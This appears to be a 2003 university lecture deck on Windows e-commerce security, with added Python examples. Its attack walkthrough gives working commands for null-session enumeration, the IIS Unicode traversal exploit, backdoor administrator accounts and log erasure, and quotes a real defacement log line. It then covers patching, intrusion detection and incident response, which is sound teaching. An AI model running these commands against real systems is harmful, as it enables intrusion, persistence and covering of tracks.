Windows Security Analysis Computer Science E-Commerce Security ‘2003’ Matthew Cook http://escarpment.net/
Introduction Loughborough University http://www.lboro.ac.uk/computing/ Bandwidth Management Advisory Service http://bmas.ja.net/
Windows Security Analysis • Introduction • Step-by-step Machine Compromise • Preventing Attack • Incident Response • Further Reading
Introduction Basic Security Overview
Physical Security • Secure Location • BIOS restrictions • Password Protection • Boot Devices • Case Locks • Case Panels
Security Threats • Denial of Service • Theft of information • Modification • Fabrication (Spoofing or Masquerading)
Security Threats… Why a compromise can occur: • Physical Security Holes • Software Security Holes • Incompatible Usage Security Holes • Social Engineering • Complacency
The Easiest Security Improvement • Good passwords • Usernames and passwords are the primary security defence • Use a password that is easy to type, so that ‘shoulder surfers’ have less time to watch you enter it • Build it from the first letters of song titles, song lyrics or film quotations
Can you buy Security? “This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?” Bruce Schneier
Step-by-step Machine Compromise Why, where, how?
Background Reasons for Attack: • Personal Issues • Political Statement • Financial Gain (Theft of money, information) • Learning Experience • DoS (Denial of Service) • Support for Illegal Activity
Gathering Information • Companies House • Internet Search URL: http://www.google.co.uk • Whois URL: http://www.netsol.com/cgi-bin/whois/whois • A Whois query can provide: • The registrant • The domain names registered • The administrative, technical and billing contacts • Record created and updated date stamps • DNS servers for the domain
Gathering Information… • Use nslookup or dig • dig @<dns server> <name> <query type> • Different query types available: • A – Network (IPv4) address • ANY – All or any information available • MX – Mail exchange records • SOA – Start of Authority • HINFO – Host information • AXFR – Zone transfer (only succeeds if the server allows transfers to your address; a correctly configured server refuses) • TXT – Additional strings
Identifying System Weakness Many products available: • Nmap • Nessus • Pandora • Pwdump • L0pht Crack • Null Authentication
Nmap • Port scanning tool • Stealth scanning, OS fingerprinting • Open Source • Runs under Unix-based OS • Win32 port in development • URL: http://www.insecure.org/nmap/
Nessus • Remote security scanner • Very comprehensive • Frequently updated modules • Testing of DoS attacks • Open Source • Win32 and Java Client • URL: http://nessus.org/
pwdump • Version 3 (e = encrypted) • Developed by Phil Staubs and Erik Hjelmstad • Based on pwdump and pwdump2 • URL: http://www.ebiz-tech.com/html/pwdump.html • Needs administrative privileges • Extracts hashes even if syskey is enabled • Extracts hashes from remote machines • Identifies accounts with no password • Self-contained utility
L0pht Crack • Password Auditing and Recovery • Crack Passwords from many sources • Registration $249 • URL: http://www.atstake.com/research/lc3/
L0pht Crack Crack Passwords from: • Local Machine • Remote Machine • SAM File • SMB Sniffer • PWDump file
Nmap Analysis • nmap -sP 158.125.0.0/16 – Ping scan • nmap -sS 158.125.0.0/16 – Stealth (SYN) scan
Nmap Analysis… • TCP Connect Scan (-sT) • Completes a ‘Three Way Handshake’ • Very noisy (logged by the application and detected by IDS)
Nmap Analysis… • TCP SYN Scan (-sS) • Half-open scanning (the TCP connection is never completed; nmap answers the SYN/ACK with a RST) • Less noisy than the TCP Connect Scan
Nmap Analysis… • TCP FIN Scan (-sF) • FIN packet sent to target port • RST returned for all closed ports, nothing for open ports • Mostly works against Unix-based TCP/IP stacks; Windows returns a RST whether the port is open or closed, so FIN, Xmas and Null scans tell you nothing there • TCP Xmas Tree Scan (-sX) • Sends a packet with the FIN, URG and PSH flags set • RST returned for all closed ports • TCP Null Scan (-sN) • No flags set • RST returned for all closed ports • UDP Scan (-sU) • UDP packet sent to target port • ‘ICMP Port Unreachable’ for closed ports; no reply for open (or filtered) ports
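The scan types listed above, as an added example that is not part of the original slides: a small Python classifier that names a probe from its TCP flags, predicts the reply of an RFC 793 stack versus a Windows stack, and flags sources that hit many distinct ports with one probe type (the rule a simple portscan preprocessor applies). The packet records, the 158.125.x target addresses and the threshold of ten ports are all constructed for the example.

```python
"""Added example (not from the original slides): classify TCP probes by flag
combination, predict the target's reply, and spot a scanner in a packet list.
Packets are constructed tuples, not live capture."""

from collections import defaultdict

# TCP flag bits from the flags byte of the TCP header.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

SCAN_TYPES = {
    SYN: "syn",               # -sS (also the first segment of a -sT connect scan)
    0: "null",                # -sN: no flags set
    FIN: "fin",               # -sF
    FIN | PSH | URG: "xmas",  # -sX
}


def classify_probe(flags):
    """Name the scan type implied by an unsolicited segment's flags, or None."""
    if flags & (ACK | RST):
        return None           # part of an existing conversation, not a probe
    return SCAN_TYPES.get(flags)


def expected_reply(scan, port_open, windows_stack):
    """Reply per RFC 793 for FIN/NULL/Xmas; Windows answers RST either way."""
    if scan == "syn":
        return "SYN/ACK" if port_open else "RST"
    if scan in ("fin", "null", "xmas"):
        if windows_stack or not port_open:
            return "RST"
        return None           # RFC 793 stack silently drops the probe on an open port
    raise ValueError(scan)


def port_open_from_reply(scan, reply, windows_stack):
    """How nmap reads the reply; for inverse scans against Windows it cannot."""
    if scan == "syn":
        return reply == "SYN/ACK"
    if windows_stack:
        return None           # RST for open and closed alike: no information
    return reply is None


def detect_scanners(packets, threshold=10):
    """Sources that probed at least `threshold` distinct ports with one scan type."""
    seen = defaultdict(set)
    for src, dst, dport, flags in packets:
        scan = classify_probe(flags)
        if scan:
            seen[(src, scan)].add((dst, dport))
    return {key: len(ports) for key, ports in seen.items() if len(ports) >= threshold}


# Constructed traffic: one host SYN-scanning 12 ports, one Xmas-scanning 11,
# plus an ordinary web connection that must not be flagged.
SAMPLE = (
    [("10.0.0.5", "158.125.1.1", p, SYN) for p in range(20, 32)]
    + [("10.0.0.9", "158.125.1.2", p, FIN | PSH | URG) for p in range(135, 146)]
    + [("10.0.0.7", "158.125.1.3", 80, SYN),
       ("10.0.0.7", "158.125.1.3", 80, ACK),
       ("10.0.0.7", "158.125.1.3", 80, PSH | ACK)]
)

if __name__ == "__main__":
    for (src, scan), n in detect_scanners(SAMPLE).items():
        print(f"{src}: {scan} scan of {n} ports")
```

The threshold is the knob to tune: too low and a busy web client gets flagged, too high and a slow scan of a handful of interesting ports is missed.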
Null Authentication Null Authentication: • net use \\camford\IPC$ "" /u:"" • Famous tools like ‘Red Button’ • net view \\camford • List of users, groups and shares • Last logged-on date • Last password change • Much more…
Exploiting the Security Hole • Using IIS Unicode/Directory Traversal (MS00-078) • /scripts/../../winnt/system32/cmd.exe?/c+dir – rejected: IIS spots the ‘..’ • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir – accepted: %c0%af is an overlong UTF-8 encoding of ‘/’ that IIS only decoded after its traversal check • Displays the directory listing in the browser • Copy cmd.exe to /scripts/root.exe • Echo upload.asp • GET /scripts/root.exe /c+echo+[blah]>upload.asp • Upload cmdasp.asp using upload.asp • Still vulnerable on 24% of E-Commerce servers
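An added example (not from the original slides) showing why the ..%c0%af.. request succeeds where the plain ../../ request fails. The two filter functions are a simplified model, not IIS code: the vulnerable one checks for ‘..’ on the percent-decoded bytes before UTF-8 decoding, as IIS did before MS00-078; the hardened one decodes strictly (which rejects overlong sequences), canonicalises, then checks. The function names and the lenient decoder are assumptions made for the example.

```python
"""Added example (not from the original slides): a model of the IIS Unicode
traversal check before and after the fix.  Nothing here is IIS code."""

from urllib.parse import unquote_to_bytes


def lenient_utf8_decode(data):
    """Decode UTF-8 while accepting overlong 2-byte sequences, as old IIS did:
    C0 AF becomes '/' although the only valid encoding of '/' is 2F."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(data) and (data[i + 1] & 0xC0) == 0x80:
            # No overlong check here: this is the flaw being modelled.
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def canonical_depth(path):
    """Walk the path segments; None if '..' climbs above the web root."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return None
        else:
            depth += 1
    return depth


def vulnerable_filter_allows(url_path):
    """Pre-fix model: the '..' check runs on percent-decoded bytes before
    UTF-8 decoding, so '..\\xc0\\xaf..' looks like one harmless segment."""
    raw = unquote_to_bytes(url_path)
    return canonical_depth(raw.decode("latin-1")) is not None


def path_actually_opened(url_path):
    """What the file system layer sees after its lenient UTF-8 decode."""
    return lenient_utf8_decode(unquote_to_bytes(url_path))


def hardened_filter_allows(url_path):
    """Post-fix model: strict UTF-8 decode (overlong forms raise), then
    canonicalise, then check.  Undecodable input is rejected outright."""
    try:
        text = unquote_to_bytes(url_path).decode("utf-8")
    except UnicodeDecodeError:
        return False
    return canonical_depth(text) is not None


if __name__ == "__main__":
    for u in ("/scripts/../../winnt/system32/cmd.exe",
              "/scripts/..%c0%af../winnt/system32/cmd.exe"):
        opened = path_actually_opened(u)
        print(u, "| old filter allows:", vulnerable_filter_allows(u),
              "| opens:", opened, "| escapes root:", canonical_depth(opened) is None,
              "| hardened allows:", hardened_filter_allows(u))
```

The general lesson is the ordering: decode and canonicalise first, then apply the security check to the form the file system will actually use. A check applied to any earlier representation can be bypassed by whatever decoding still lies ahead of it.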
Gaining ‘Root’ • cmdasp.asp provides a cmd shell, but it runs as the IIS anonymous/worker account, not SYSTEM • Raising those privileges is now simple • In-process ISAPI extension (idq.dll) + RevertToSelf (Horovitz): inetinfo.exe runs as SYSTEM, so dropping impersonation yields SYSTEM • Version 2 coded by Foundstone • http://camford/scripts/idq.dll? • Patch Bulletin: MS01-026 • NOT included in Windows 2000 SP2
Backdoor Access • Create several user accounts • net user iisservice <pass> /ADD • net localgroup administrators iisservice /ADD • Add root shells on high-numbered ports • Tini is 3 KB in size • Add backdoors to the ‘Run’ registry keys so they survive a reboot
System Alteration • Web page alteration • Information theft • Enable services • Add VNC • Creating a warez server • net start msftpsvc • Check access • Upload a 1 MB file to confirm write access and throughput • Advertise as a warez server
Audit Trail Removal • Many machines have auditing disabled • The main problem for the attacker is the IIS logs • DoS IIS before the buffered logs are flushed to disc • Erase logs from the hard disc • Erasing the Event Log is harder • What the attacker cannot touch: IDS systems • Network monitoring at the firewall
Preventing Attack How to stop the attack from happening and how to limit the damage from crackers!
NetBIOS/SMB Services • NetBIOS Name Service [UDP 137] • NetBIOS Datagram Service (browsing) [UDP 138] • NetBIOS Session Service [TCP 139] • RPC endpoint mapper [TCP 135] (not NetBIOS, but exposed alongside it) • CIFS/SMB direct [TCP 445, UDP 445] • Port 445 Windows 2000 and later only • Block these ports at the firewall • Check what is listening: netstat -an
NetBIOS/SMB Services… To disable NetBIOS • Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties. • Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window
NetBIOS/SMB Services… Disable Null Authentication • HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous • REG_DWORD set to 0, 1 or 2 (2 is Windows 2000 only and blocks all anonymous access; it can break browsing, trusts with NT 4 domains and some services, so test before rolling it out) • HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous • REG_DWORD set to 0 or 1
Operating System Patching • Operating systems contain bugs, and patches are the usual way of distributing fixes. • A patch or hotfix usually contains a fix for one discovered bug. • Service packs bundle many patches or hotfixes; there are well over 200 hotfixes in the soon-to-be-released SP4 for Windows 2000.
Operating System Patching… • Only install patches after you have tested them in a development environment. • Only install patches obtained directly from the vendor. • Install security patches as soon as possible after release. • Install feature patches as and when needed. • Automate patch collection and installation as much as possible (QChain lets several hotfixes be installed with a single reboot).
Operating System Patching… Use automated patching technology: • SUS – Microsoft Software Update Services • SMS – Microsoft Systems Management Server • Ghost – Symantec imaging software • And other application deployment software: • Lights-out distribution • Deferred installation
Baseline Security Analyzer • Freely available from Microsoft • Written by Shavlik Technologies as a direct result of Code Red attacks • A GUI to HFNetChk (v3.81) • Improved feature set • Integrated SUS functionality
Baseline Security Analyzer… MBSA v1.1 supports the following host OS: • Windows 2000 Professional / Server • Windows XP Home / Professional • Windows .NET (the pre-release name of Windows Server 2003) not officially supported • Windows NT not supported as host OS • Remote scanning available
Baseline Security Analyzer… What applications does MBSA scan? • Operating system • Internet Explorer 5.01 and later • Microsoft Office 2000 and 2002 • Media Player 6.4 and later • Internet Information Services 4.0 and 5.0 • SQL Server 7.0 and 2000 • Exchange Server 5.5 and 2000
IPSec • IP security • Linux Connectivity using FreeS/WAN • Mainly for wireless use • WEP encryption cracked • URL: http://www.freeswan.org/ • URL: http://airsnort.sourceforge.net/
Recent Worms • Sadmind/IIS – Directory Traversal (Unicode exploit) • Code Red – ida/idq buffer overflow • Code Green – ida/idq buffer overflow • Nimda – Directory Traversal (Unicode exploit) • Slammer – MS SQL Server Resolution Service buffer overflow (UDP 1434)
Sadmind/IIS • 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 200 -
IDS Snort • IDS – Intrusion Detection System • Libpcap packet sniffer and logger • Originally developed for the Unix platforms • Open Source • Port to Win32 available (Release 1.8.1) • Installation on Win32 in under 30 minutes • Run on your IIS server or standalone
IDS Snort… Snort can detect: • Stealth Port Scans • CGI Attacks • Front Page Extensions Attacks • ICMP Activity • SMTP Activity • SQL Activity • SMB Probes
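An added example (not part of the original slides) of the kind of signature checks in the Snort list, run over IIS W3C extended log lines instead of packets, using the field order of the sadmind/IIS log entry shown above. The log lines, signature names and regular expressions are constructed for the example; they are not Snort rules and the addresses are invented.

```python
"""Added example (not from the original slides): signature matching over IIS
W3C extended log lines.  Field order follows the sadmind/IIS entry in the
deck: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem
cs-uri-query sc-status cs(User-Agent).  All sample lines are constructed."""

import re

FIELDS = ["date", "time", "c_ip", "username", "s_ip", "s_port",
          "method", "uri_stem", "uri_query", "status", "user_agent"]

# (name, pattern over "stem query").  Constructed for the example.
SIGNATURES = [
    ("iis-unicode-traversal", re.compile(r"%c0%af|%c1%9c|%255c|%%35c", re.I)),
    ("iis-root-exe",          re.compile(r"/root\.exe", re.I)),
    ("iis-cmd-exe",           re.compile(r"cmd\.exe", re.I)),
    ("iis-echo-redirect",     re.compile(r"/c\+echo\+.*>", re.I)),   # shell writes a file
    ("ida-idq-overflow",      re.compile(r"\.id[aq]\s+\S*%u[0-9a-f]{4}", re.I)),  # Code Red style
]


def parse_w3c_line(line):
    """Split one log line into a dict; None for comment lines or short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts[:len(FIELDS)]))


def match_signatures(entry):
    """Names of every signature that fires on the request stem and query."""
    target = f"{entry['uri_stem']} {entry['uri_query']}"
    return [name for name, rx in SIGNATURES if rx.search(target)]


def scan_log(lines):
    """One alert per matching line.  A 200 means the server executed the
    request; a 404 on the same signature is a probe against a patched box."""
    alerts = []
    for line in lines:
        entry = parse_w3c_line(line)
        if not entry:
            continue
        hits = match_signatures(entry)
        if hits:
            alerts.append({"client": entry["c_ip"], "sigs": hits,
                           "status": entry["status"],
                           "succeeded": entry["status"] == "200"})
    return alerts


# Constructed log: a sadmind/IIS-style defacement, two traversal attempts
# (one against a patched path, one that worked), a Code Red probe and a
# normal page fetch that must not alert.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-05-03 22:34:49 203.67.1.1 - 158.125.1.1 80 GET /scripts/root.exe /c+echo+defaced>../wwwroot/default.htm 200 -
2001-09-18 09:12:03 10.1.2.3 - 158.125.1.1 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 09:12:05 10.1.2.3 - 158.125.1.1 80 GET /msadc/..%255c../..%255c../winnt/system32/cmd.exe /c+dir 200 -
2001-07-19 14:02:11 10.9.9.9 - 158.125.1.1 80 GET /default.ida NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3 200 -
2001-05-03 22:35:10 192.168.4.4 - 158.125.1.1 80 GET /default.htm - 200 Mozilla/4.0
""".splitlines()

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["client"], a["status"], "EXECUTED" if a["succeeded"] else "probe", a["sigs"])
```

Run this over the real logs before they are lost to the audit-trail removal described earlier: the status column separates a worm knocking on a patched server from a request the server actually carried out, which is the first thing an incident responder needs to know.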
Incident Response What to do when something does go wrong!
Incident Response… • Don’t panic! • Unplug the network • Get a notebook • Back up the system and keep the backups • Restrict use of email • Look for information • Investigate the cause • Request help and assistance
Incident Response… • It is important to return to service swiftly • But do not jeopardize security to do so • If in doubt, re-build • Perform forensics on a backup, not the original • Keep documentation and evidence • Contact your local CERT if the investigation shows it was not just worm or script-kiddie activity
Further Reading • Garfinkel, S. Web Security & Commerce, O’Reilly [ISBN 1-56592-269-7] • Hassler, V. Security Fundamentals for E-Commerce, Artech House [ISBN 1-58053-108-3] • Huth, M. R. A. Secure Communicating Systems, Cambridge University Press [ISBN 0-52180-731-X] • Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]
Useful Books, Tools and URLs • Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.) • Incident Response. (Kenneth R. van Wyk, Richard Forno.) • Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al) • Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)